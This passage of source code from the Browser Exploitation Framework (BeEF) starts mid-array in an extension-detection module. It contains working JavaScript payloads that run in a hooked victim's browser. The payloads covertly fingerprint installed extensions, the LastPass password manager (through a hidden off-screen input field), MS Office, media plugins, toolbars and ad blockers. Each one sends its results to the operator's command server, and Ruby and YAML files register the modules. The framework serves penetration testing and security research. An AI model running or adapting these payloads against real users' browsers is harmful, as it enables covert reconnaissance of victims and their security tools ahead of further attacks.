Array("foloenejobmljmemkomjcofkdjdnkggn","Radios do Brasil"), new Array("ekmnknlahnpppljnjacdbpnlpbkckcki","FlyOrDie Four in a Row"), new Array("aifpigcngkjdlbkjmkmhkhmhaepoielk","Learn European Languages (FREE VERSION)"), new Array("apdiogojbmdncjdpljocafnigiokgmci","UJAM - Make your music. Be heard."), new Array("hljnlfolmbmibdjaikiaepgepgnldclj","Simple Highlighter"), new Array("ofgppnjcdndocgicmodblmfmbdibefbm","\u8c46\u74e3FM \u7cbe\u7f8e\u7248"), new Array("aomjekmpappghadlogpigifkghlmebjk","Speech Recognizer"), new Array("ienibllimcjfdingpoihjipomkjnpial","Warzone Tower Defense"), new Array("jbmoechgcbcngboikkfiojlnefcgjepp","YourNextRead"), new Array("ojflnhjodgafkhbmblnpkkaomffojpca","The Impossible Quiz"), new Array("klicmgamjpclmbhppmdeamffedflmkcn","Sand 2"), new Array("jemlklgaibiijojffihnhieihhagocma","SingleFile Core"), new Array("mbnhjlkenpmankjjbbolibfcghileiae","Like.fm Music Profile"), new Array("jldhpllghnbhlbpcmnajkpdmadaolakh","Todoist: To-Do list and Task Manager"), new Array("lnempicjilmahngopecohbcbldlijkib","Mappeo"), new Array("ggpeehmipebgblgaokenepkkinmbnipa","NASA Online TV HD"), new Array("occfbdbgdodefnegmkafdlebmmifikkn","Rally Expert"), new Array("bjbjfcgehjgipnpgfdnlbodhildpafdf","Dog Hotel"), new Array("icncamkooinmbehmkeilcccmoljfkdhp","Wolfram|Alpha (Official)"), new Array("fogikklcokfgmlhjgkgaiehnjdodahbb","Fancy Pants Adventure: World 2"), new Array("ccmmgijadofegbfojekdglknbeeminej","\u0442\u0435\u043b\u0435\u0432\u0438\u0437\u043e\u0440"), new Array("napaodofbddcgpbgepkedckklhcmpilc","Flight 3D Aerobatics Training"), new Array("hiikfoplnkjhoiafgmcobenlfnbphbee","WarLight"), new Array("mmennkmmgljpjeihfakkbfadfbbfapgm","Formula 3D"), new Array("pmjcjgbbfaajnfohkokpemdcepngehjg","Pac Man Classic"), new Array("kkmlkkjojmombglmlpbpapmhcaljjkde","Zhongwen: A Chinese-English Popup Dictionary"), new Array("knnkddolkkmempomngnbeifoijaokkom","Aviary Color Editor"), new Array("poehiocknllbldkbpcncbgdafeeaojek","Football Volley Challenge"), new Array("nijhigeigjmbjpmhelkmfabiaogaplkd","Math Lab"), new Array("megglpjmadjmghjegnallnhiknjnnjhh","Guitar Chords"), new Array("llpeeehacmdheefdajbainfmpanommnd","Guia da Semana"), new Array("abmmkpmdgmnegiciliebkdafhgdaklkl","Volagratis Pilot"), new Array("eiidclgejnacldolfgpiiffbpapdpfji","ibibo Rummy"), new Array("clbjclclcokdnbfkhnmiocjcjmdeoeaj","Wikipedia SSL"), new Array("lmgkpnbfgimlalkolndeccanfnbpogcd","Solve a Cipher!"), new Array("ncccpckadclahjkmlemjbakodaaaemig","Dragon Age Legends"), new Array("bjackipnjjjefeppmpbgcdefaplneopj","MyNetDiary Calorie Counter and Food Diary"), new Array("mkamfeggnihmfbmbidpdmkapjenacmdc","Prince Of Persia"), new Array("ballhmoamkbbfadiealjmgmhbbnellbc","Toodledo Tasks"), new Array("liamajdghafnpofaconeimppimbdbhgi","Send to Instapaper"), new Array("mjkbgbnoikoflalnbnofkfegidffigke","Yoono WebApp"), new Array("ohncmadoekkdmccmbemflhfjogbpjigc","Hotel Finder by Amazebuy"), new Array("hnldbiikfjheppkbnjbnkgimnfejifpf","Oogle"), new Array("gcolaeigjaencllpclbijidbadgkdfde","Orkut Main Kill"), new Array("jdihnhedcafgpbbbbiohamlkbbjlifdb","Math Motorway"), new Array("oiabhgfgfhoilflkoicbmnejgjjfmhcg","Photo Collage"), new Array("odlofbgmekaiejbmlpnnlfaamehffedb","Mike Shadow - I paid for it!"), new Array("lpnmkolabeomngkkeljdkgnakemkcckm","Hidden Object Games Online"), new Array("kfoaifmljjopjdffohdndabjeejbnipm","Emqualcinema"), new Array("ljpaikmjlpddojgcoaejihgoneamafap","Bloons 2"), new Array("dkpacaoamfanlmkfcalnbbcdbmfcmclf","PocketSmith - Cashflow Forecasting"), new Array("mcbpblocgmgfnpjjppndjkmgjaogfceg","FireShot: Quick Captures and Annotations"), new Array("hbenbgblhhlecmfechhfecgioakobfdl","Guitar Tuner"), new Array("cdliblldgjdficcbflpdknckckdfdkbo","Shogun's Fate"), new Array("iakncpcejjmfmplodgimgpkhlclagncg","Wlingua - Curso de ingl\u00e9s"), new Array("eocaeafeojdmijlfeheaeabellldmbcc","Monster Jobs"), new Array("hgknnkhbpkjmdfhjhpchcijdjjeajalp","Valentine Mahjong"), new Array("jhegddohmncgelkehhnigphmloinkinj","Zoho Sheet"), new Array("ebojakelgejdogaleoeoaadjpefeifen","Mail Checker Minus (Beta)"), new Array("homldgnlpldcmdflhnabedgkgpmeanhd","Tweet Button for Chrome (by Shareaholic)"), new Array("hjcccdngnaailhnoflbeficiokgcfaah","Pearltrees"), new Array("chfghejgpdfifblfijbhnhgnhpmchpom","Google Plus Directory"), new Array("lganibdddhhoohdchmljgclacnfnkfgb","World Digital Library - UNESCO"), new Array("ndfkfbdpnknippjjpkdoiadggmohdpfg","Ace Pilots"), new Array("ddjklapimfghfjjinidpblloipjnnpgb","+Music"), new Array("deonblningjbcdgiidohkfhajiinphah","USA Streets"), new Array("nhhdgipkbgjblbgjlbakfffjbffpdblo","FlyOrDie Gomoku"), new Array("celkoncipomnbmcomjieepceifpcdgdl","StoryLines"), new Array("nmgcfdmgcfldfkehdgoancleciikdlnf","DeskSMS - Send and Receive Texts Messages"), new Array("kfjkehmceppcpjoaoegdmffmkdhiegmc","Pinterest Pin It Button (by Shareaholic)"), new Array("epdnnopdcceagfjiicjceffncileogdn","Virgin Radio Italy"), new Array("egnlbiigfcfmheinfklfonfgollmjkgc","INFO Lab"), new Array("bigbpmgpdffelbefknlmefjiejgoinao","Rage Comics"), new Array("mghenlmbmjcpehccoangkdpagbcbkdpc","Session Manager"), new Array("femogenllijpkfbckgkllmiekhjipene","\u4ea6\u6b4c"), new Array("pnmeglpffblgeibddiihnafkihmkleje","Aztec Drop"), new Array("ikijikcfedekifbolhamdccnhnlkhfpf","TheDeadline"), new Array("lkobmjibnppfleogmodpjgocgdbdiikp","WarTime"), new Array("inolmjbojghkehmmlbdmpdlmagalddni","Jagran - India No.1 Hindi News Daily") ); var firefox_extensions = { "Adblock Plus" : "chrome://adblockplus/skin/adblockplus.png", "Auto Copy" : "chrome://autocopy/skin/autocopy.png", "ColorZilla" : "chrome://colorzilla/skin/logo.png", "Customize Google" : "chrome://customizegoogle/skin/32x32.png", "DownThemAll!" : "chrome://dta/content/immagini/icon.png", "Faster Fox" : "chrome://fasterfox/skin/icon.png", "Flash Block" : "chrome://flashblock/skin/flash-on-24.png", "FlashGot" : "chrome://flashgot/skin/icon32.png", "Forecastfox" : "chrome://forecastfox/skin/images/icon.png", "Google Toolbar" : "chrome://google-toolbar/skin/icon.png", "Greasemonkey" : "chrome://greasemonkey/content/status_on.gif", "IE Tab" : "chrome://ietab/skin/ietab-button-ie16.png", "IE View" : "chrome://ieview/skin/ieview-icon.png", "JS View" : "chrome://jsview/skin/jsview.gif", "Live HTTP Headers" : "chrome://livehttpheaders/skin/img/Logo.png", "MeasureIt" : "chrome://measureit/skin/measureit.png", "SEO For Firefox" : "chrome://seo4firefox/content/icon32.png", "SEOpen" : "chrome://seopen/skin/seopen.png", "Search Status" : "chrome://searchstatus/skin/cax10.png", "Server Switcher" : "chrome://switcher/skin/icon.png", "StumbleUpon" : "chrome://stumbleupon/content/skin/logo32.png", "Tab Mix Plus" : "chrome://tabmixplus/skin/tmp.png", "Torrent-Search Toolbar" : "chrome://torrent-search/skin/v.png", "User Agent Switcher" : "chrome://useragentswitcher/content/logo.png", "View Source With" : "chrome://viewsourcewith/skin/ff/tb16.png", "Web Developer" : "chrome://webdeveloper/content/images/logo.png", "Unhide Passwords" : "chrome://unhidepw/skin/unhidepw.png", "UrlParams" : "chrome://urlparams/skin/urlparams32.png", "NewsFox" : "chrome://newsfox/skin/images/home.png", "Add N Edit Cookies" : "chrome://addneditcookies/skin/images/anec32.png", "GTDGmail" : "chrome://gtdgmail/content/gtd_lineitem.png", "QuickJava" : "chrome://quickjava/content/js.png", "Adblock Filterset.G Updater" : "chrome://unplug/skin/unplug.png", "BBCode" : "chrome://bbcode/skin/bbcode.png", "BugMeNot" : "chrome://bugmenot/skin/bugmenot.png", "ConQuery" : "chrome://conquery/skin/conquery.png", "Download Manager Tweak" : "chrome://downloadmgr/skin/downloadIcon.png", "Extended Cookie Manager" : "chrome://xcm/content/allowed.png", "FireBug" : "chrome://firebug/content/firebug32.png", "FoxyTunes" : "chrome://foxytunes/skin/logo.png", "MR Tech Disable XPI Install Delay" : "chrome://disable_xpi_delay/content/icon.png", "SessionSaver .2" : "chrome://sessionsaver/content/ss.png", "spooFX" : "chrome://spoofx/skin/main/spoofx.png", "Statusbar Clock" : "chrome://timestatus/skin/icon.png", "Torbutton" : "chrome://torbutton/skin/bigbutton_gr.png", "UnPlug" : "chrome://unplug/skin/unplug.png", "View Source Chart" : "chrome://vrs/skin/vrssmall.png", "XPather" : "chrome://xpather/content/iconka.png", "WOT" : "chrome://wot/skin/fusion/logo.png", "LastPass" : "chrome://lastpass/skin/vaultdelete.png", }; var failed = false; var detect_chrome_extension = function(addon_id, addon_name) { if (failed) { return false; } var s = document.createElement('script'); s.onload = function() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension='+addon_name); } s.onerror = function() { throw 'detect_chrome_extension'; } s.src = 'chrome-extension://' + addon_id + '/manifest.json'; document.body.appendChild(s); } var detect_firefox_extension = function(addon_url, addon_name) { if (failed) { return false; } var img = document.createElement("img"); img.setAttribute("border", '0'); img.setAttribute("width", '0'); img.setAttribute("height", '0'); img.setAttribute("onload", "beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension=" + addon_name+ "');"); img.setAttribute('onerror', 'throw "detect_firefox_extension"'); img.setAttribute("src", addon_url); } if(beef.browser.isC()) { try { window.onerror = function (e) { if (!failed) { failed = true; if (e.indexOf("detect_chrome_extension") != -1) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Chrome extensions failed', beef.are.status_error()); } } }; for (var i=0; i<chrome_extensions.length; i++) { detect_chrome_extension(chrome_extensions[i][0], chrome_extensions[i][1]); } } catch(e) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Chrome extensions failed', beef.are.status_error()); } } else if(beef.browser.isFF()) { try { window.onerror = function (e) { if (!failed) { failed = true; if (e.indexOf("detect_firefox_extension") != -1) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Firefox extensions failed', beef.are.status_error()); } } }; for (var i in firefox_extensions) { detect_firefox_extension(firefox_extensions[i], i); } } catch(e) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Firefox extensions failed', beef.are.status_error()); } } else { beef.debug('[Detect Extensions] Unspported browser'); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=unsupported browser', beef.are.status_error()); } });
YAML
beef/modules/browser/detect_extensions/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: detect_extensions: enable: true category: "Browser" name: "Detect Extensions" description: "This module detects extensions installed in Google Chrome and Mozilla Firefox." authors: ["koto", "bcoles", "nbblrr"] target: working: FF: min_ver: 1 max_ver: 50 C: min_ver: 1 max_ver: 18 not_working: ["All"]
Ruby
beef/modules/browser/detect_extensions/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # More info: # http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html # http://jeremiahgrossman.blogspot.fr/2006/08/i-know-what-youve-got-firefox.html # class Detect_extensions < BeEF::Core::Command def post_execute content = {} content['extension'] = @datastore['extension'] save content end end
JavaScript
beef/modules/browser/detect_firebug/command.js
// // Copyright (c) 2006-2023 Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var result = "Not in use or not installed"; if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled and in use!"; beef.net.send("<%= @command_url %>", <%= @command_id %>, "firebug="+result); });
YAML
beef/modules/browser/detect_firebug/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: detect_firebug: enable: true category: "Browser" name: "Detect FireBug" description: "This module checks if the Mozilla Firefox Firebug extension is being use to inspect the current window." authors: ["bcoles"] target: working: ["FF"] not_working: ["All"]
Ruby
beef/modules/browser/detect_firebug/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_firebug < BeEF::Core::Command def post_execute content = {} content['firebug'] = @datastore['firebug'] unless @datastore['firebug'].nil? save content end end
JavaScript
beef/modules/browser/detect_foxit/command.js
// // Copyright (c) 2006-2023 Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var result = ( beef.browser.hasFoxit() )? "Yes" : "No"; beef.net.send("<%= @command_url %>", <%= @command_id %>, "foxit="+result); });
YAML
beef/modules/browser/detect_foxit/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: detect_foxit: enable: true category: "Browser" name: "Detect Foxit Reader" description: "This module will check if the browser has Foxit Reader Plugin." authors: ["javuto"] target: working: ["All"]
Ruby
beef/modules/browser/detect_foxit/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_foxit < BeEF::Core::Command def post_execute content = {} content['foxit'] = @datastore['foxit'] save content BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'HasFoxit', Regexp.last_match(1)) if @datastore['results'] =~ /^foxit=(Yes|No)/ end end
JavaScript
beef/modules/browser/detect_lastpass/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function () { var result = "Not in use or not installed"; // The following base64 encoded string represents the LastPass inline PNG which is inserted into user/pass form fields var base64PNG = "iVBORw0KGgoAAAANSUhEUgAAABAAAAASCAYAAABSO15qAAAAAXNSR0IArs4c6QAAAPhJREFUOBHlU70KgzAQPlMhEvoQTg6OPoOjT+JWOnRqkUKHgqWP4OQbOPokTk6OTkVULNSLVc62oJmbIdzd95NcuGjX2/3YVI/Ts+t0WLE2ut5xsQ0O+90F6UxFjAI8qNcEGONia08e6MNONYwCS7EQAizLmtGUDEzTBNd1fxsYhjEBnHPQNG3KKTYV34F8ec/zwHEciOMYyrIE3/ehKAqIoggo9inGXKmFXwbyBkmSQJqmUNe15IRhCG3byphitm1/eUzDM4qR0TTNjEixGdAnSi3keS5vSk2UDKqqgizLqB4YzvassiKhGtZ/jDMtLOnHz7TE+yf8BaDZXA509yeBAAAAAElFTkSuQmCC"; let createInputField = function () { beef.debug("Module - Detect LastPass: Generating input field"); return new Promise((resolve, reject) => { var input = document.createElement("input"); input.type = "text"; input.id = "username"; input.name = "username"; input.setAttribute("style", "display:none;position:absolute;visibility:hidden;top:-1000px;left:-1000px;border:none;"); document.body.appendChild(input); beef.debug("Module - Detect LastPass: Input field generated"); // FF requires some interaction to trigger extension function, so we use a timeout to wait 5 seconds in the hope that a user interacts if (beef.browser.isFF()) { setTimeout(() => { resolve(); }, 5000); } else { // `1 second timout to allow DOM to update setTimeout(() => { resolve(); }, 1000); } }) } let detectLastPass = function () { beef.debug("Module - Detect LastPass: Looking for input field"); return new Promise((resolve, reject) => { // Detect input form fields with the injected LastPass PNG as background image var bginput = $j('input[style]'); var lpdiv = document.getElementById('hiddenlpsubmitdiv'); if (bginput.length > 0) { beef.debug("Module - Detect LastPass: Input field with 'style' attribute found: " + bginput); for (var i = 0; i < bginput.length; i++) { beef.debug("Module - Detect LastPass: Number of potential input fields with 'style' attribute found: " + bginput.length); var styleContent = bginput[i].getAttribute('style'); if (styleContent.includes(base64PNG)) { beef.debug('Module - Detect LastPass: Matching inline PNG detected'); result = "Detected LastPass through presence of inline base64-encoded PNG within input form field"; } } // Detect presence of LastPass iframe } else if ($j("iframe[name='LPFrame']").length > 0) { beef.debug('Module - Detect LastPass: Matching iframe found'); result = "Detected LastPass through presence of LastPass 'save password' iframe"; // Below is the older method of LastPass detection method } else if (typeof (lpdiv) != 'undefined' && lpdiv != null) { result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv"; } else if ($j("script:contains(lastpass_iter)").length > 0) { result = "Detected LastPass through presense of the embedded <script> which includes references to lastpass_iter"; } resolve(); }) } function getResult() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "lastpass=" + result); } createInputField().then(detectLastPass).then(getResult); });
YAML
beef/modules/browser/detect_lastpass/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: detect_lastpass: enable: true category: "Browser" name: "Detect LastPass" description: "This module checks if the LastPass extension is installed and active." authors: ["xntrik","DeezyE"] target: not_working: ["IE"] working: ["All"]
Ruby
beef/modules/browser/detect_lastpass/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_lastpass < BeEF::Core::Command def post_execute content = {} content['lastpass'] = @datastore['lastpass'] unless @datastore['lastpass'].nil? save content end end
JavaScript
beef/modules/browser/detect_mime_types/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { if (navigator.mimeTypes) { var mime_types = JSON.stringify(navigator.mimeTypes); beef.net.send("<%= @command_url %>", <%= @command_id %>, "mime_types=" + mime_types, beef.are.status_success()); beef.debug("[Detect MIME Types] " + mime_types); } else { beef.debug("[Detect MIME Types] Could not retrieve supported MIME types"); beef.net.send("<%= @command_url %>", <%= @command_id %>, 'fail=Could not retrieve supported MIME types', beef.are.status_error()); } });
YAML
beef/modules/browser/detect_mime_types/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: detect_mime_types: enable: true category: "Browser" name: "Detect MIME Types" description: "This module retrieves the browser's supported MIME types." authors: ["bcoles"] target: working: ["All"] not_working: ["IE"]
Ruby
beef/modules/browser/detect_mime_types/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_mime_types < BeEF::Core::Command def post_execute content = {} content['mime_types'] = @datastore['mime_types'] unless @datastore['mime_types'].nil? save content end end
JavaScript
beef/modules/browser/detect_office/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var ma = 1; var mb = 1; var mc = 1; var md = 1; try { ma = new ActiveXObject("SharePoint.OpenDocuments.4") } catch (e) {} try { mb = new ActiveXObject("SharePoint.OpenDocuments.3") } catch (e) {} try { mc = new ActiveXObject("SharePoint.OpenDocuments.2") } catch (e) {} try { md = new ActiveXObject("SharePoint.OpenDocuments.1") } catch (e) {} var a = typeof ma; var b = typeof mb; var c = typeof mc; var d = typeof md; var key = "No Office Found"; if (a == "object" && b == "object" && c == "object" && d == "object") { key = "Office 2010" } if (a == "number" && b == "object" && c == "object" && d == "object") { key = "Office 2007" } if (a == "number" && b == "number" && c == "object" && d == "object") { key = "Office 2003" } if (a == "number" && b == "number" && c == "number" && d == "object") { key = "Office Xp" } beef.net.send("<%= @command_url %>", <%= @command_id %>, "office="+key); });
YAML
beef/modules/browser/detect_office/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: detect_office: enable: true category: "Browser" name: "Detect MS Office" description: "This module detect the version of MS Office if installed" authors: ["nbblrr"] target: working: ["IE"] not_working: ["All"]
Ruby
beef/modules/browser/detect_office/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_office < BeEF::Core::Command def post_execute content = {} content['office'] = @datastore['office'] save content BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'HasOffice', Regexp.last_match(1)) if @datastore['results'] =~ /^office=Office (\d+|Xp)/ end end
JavaScript
beef/modules/browser/detect_popup_blocker/command.js
// // Copyright (c) 2006-2023 Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "popup_blocker_enabled="+beef.browser.popup.blocker_enabled()); });
YAML
beef/modules/browser/detect_popup_blocker/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: detect_popup_blocker: enable: true category: "Browser" name: "Detect Popup Blocker" description: "Detect if popup blocker is enabled." authors: ["wade"] target: user_notify: ["All"]
Ruby
beef/modules/browser/detect_popup_blocker/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_popup_blocker < BeEF::Core::Command def post_execute content = {} content['popup_blocker_enabled'] = @datastore['popup_blocker_enabled'] save content end end
JavaScript
beef/modules/browser/detect_quicktime/command.js
// // Copyright (c) 2006-2023 Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var result = (beef.browser.hasQuickTime())? "Yes" : "No"; beef.net.send("<%= @command_url %>", <%= @command_id %>, "quicktime="+result); });
YAML
beef/modules/browser/detect_quicktime/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: detect_quicktime: enable: true category: "Browser" name: "Detect QuickTime" description: "This module will check if the browser has Quicktime support." authors: ["bcoles"] target: working: ["All"]
Ruby
beef/modules/browser/detect_quicktime/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_quicktime < BeEF::Core::Command def post_execute content = {} content['quicktime'] = @datastore['quicktime'] save content end end
JavaScript
beef/modules/browser/detect_realplayer/command.js
// // Copyright (c) 2006-2023 Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var result = ( beef.browser.hasRealPlayer() )? "Yes" : "No"; beef.net.send("<%= @command_url %>", <%= @command_id %>, "realplayer="+result); });
YAML
beef/modules/browser/detect_realplayer/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: detect_realplayer: enable: true category: "Browser" name: "Detect RealPlayer" description: "This module will check if the browser has RealPlayer support." authors: ["gcattani"] target: working: ["All"]
Ruby
beef/modules/browser/detect_realplayer/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_realplayer < BeEF::Core::Command def post_execute content = {} content['realplayer'] = @datastore['realplayer'] save content end end
JavaScript
beef/modules/browser/detect_silverlight/command.js
// // Copyright (c) 2006-2023 Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var result = (beef.browser.hasSilverlight())? "Yes" : "No"; beef.net.send("<%= @command_url %>", <%= @command_id %>, "silverlight="+result); });
YAML
beef/modules/browser/detect_silverlight/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: detect_silverlight: enable: true category: "Browser" name: "Detect Silverlight" description: "This module will check if the browser has Silverlight support." authors: ["bcoles"] target: working: ["ALL"]
Ruby
beef/modules/browser/detect_silverlight/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_silverlight < BeEF::Core::Command def post_execute content = {} content['silverlight'] = @datastore['silverlight'] save content end end
JavaScript
beef/modules/browser/detect_simple_adblock/command.js
// Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { if (document.getElementById('adblock_img')) { return "Img already created"; } var img = new Image(); img.setAttribute("style","visibility:hidden"); img.setAttribute("width","0"); img.setAttribute("height","0"); img.src = 'http://simple-adblock.com/adblocktest/files/adbanner.gif'; img.id = 'adblock_img'; img.setAttribute("attr","start"); img.onerror = function() { this.setAttribute("attr","error"); }; img.onload = function() { this.setAttribute("attr","load"); }; document.body.appendChild(img); setTimeout(function() { var img = document.getElementById('adblock_img'); if (img.getAttribute("attr") == "error") { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock returned an error'); } else if (img.getAttribute("attr") == "load") { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock is disabled or not installed'); } else if (img.getAttribute("attr") == "start") { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock is enabled'); }; document.body.removeChild(img); }, 10000); });
YAML
beef/modules/browser/detect_simple_adblock/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: detect_simple_adblock: enable: true category: "Browser" name: "Detect Simple Adblock" description: "This module checks if the Simple Adblock module is active." authors: ["sussurro"] target: working: ["IE"] not_working: ["All"]
Ruby
beef/modules/browser/detect_simple_adblock/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_simple_adblock < BeEF::Core::Command def post_execute content = {} content['simple_adblock'] = @datastore['simple_adblock'] unless @datastore['simple_adblock'].nil? save content end end
JavaScript
beef/modules/browser/detect_toolbars/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var toolbar_ua = new Array ( new Array (" Alexa Toolbar", " Alexa"), new Array (" AskTbS-PV", " Ask"), new Array (" BRI", " Bing"), new Array (" GTB", " Google"), new Array (" SU ", " Stumble Upon") ) var toolbar_id = new Array ( new Array ("AlexaCustomScriptId", " Alexa") ) var result = ''; var separator = ", "; // CHECK USER-AGENT for (var i = 0; i < toolbar_ua.length; i++) { var agentRegex = new RegExp( toolbar_ua[i][0], 'g' ); if ( agentRegex.exec(navigator.userAgent) ) { result += toolbar_ua[i][1] + separator; } } // CHECK ELEMENT ID (DOM) for (var i = 0; i < toolbar_id.length; i++) { var element = document.getElementById( toolbar_id[i][0] ); if ( typeof(element) != 'undefined' && element != null ) { result += toolbar_id[i][1] + separator; } } // ENDING if ( result != '' ) { result = result.slice(0, -separator.length); } else if ( result == '' ) { result = " no toolbars detected"; } beef.net.send("<%= @command_url %>", <%= @command_id %>, "toolbars="+result); });
YAML
beef/modules/browser/detect_toolbars/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: Detect_toolbars: enable: true category: "Browser" name: "Detect Toolbars" description: "Detects which browser toolbars are installed." authors: ["gcattani"] target: working: ["All"]
Ruby
beef/modules/browser/detect_toolbars/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_toolbars < BeEF::Core::Command def post_execute content = {} content['toolbars'] = @datastore['toolbars'] save content end end
JavaScript
beef/modules/browser/detect_unity/command.js
